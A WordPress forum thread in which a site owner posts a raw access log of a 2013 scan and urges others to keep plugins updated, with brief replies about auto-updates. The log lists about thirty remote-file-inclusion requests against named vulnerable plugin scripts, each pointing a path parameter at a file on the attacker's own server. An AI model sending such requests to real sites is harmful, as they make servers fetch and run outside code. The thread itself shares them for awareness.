Reasons to keep your wp site up to date

wordpress

#1

Hi!

Just found this little scrip kiddie this morning on one of my sites:

94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-content/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 403 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/plugins/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:54 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:56 -0700] “GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:58 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:59 -0700] “GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:00 -0700] “GET /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:01 -0700] “GET /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:03 -0700] “GET /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:04 -0700] “GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:05 -0700] “GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:06 -0700] “GET /wp-content/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:07 -0700] “GET /wp-content/plugins/livesig/livesig-ajax-backend.php?$_POST[‘wp-root’]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/enable-latex/core.php?url=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/mailz/lists/config/config.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?_POST[“abspath”]=http://94.199.51.7/readme.txt? HTTP/1.1” 503 532 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” “Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0”

It’s an inventory of broken plugins, if your wesbite is up to date, this won’t affect you, but if you’ve fallen asleep with your updates…


#2

Yummy exploits delivered directly to your Admin Panel courtesy of wordpress.org

The default install tagline should be “Just another soon-to-be-exploited WordPress site”


#3

I’ve been using http://wordpress.org/extend/plugins/automatic-updater/ to keep my plugins and themes up to date. Works like a champ :slight_smile: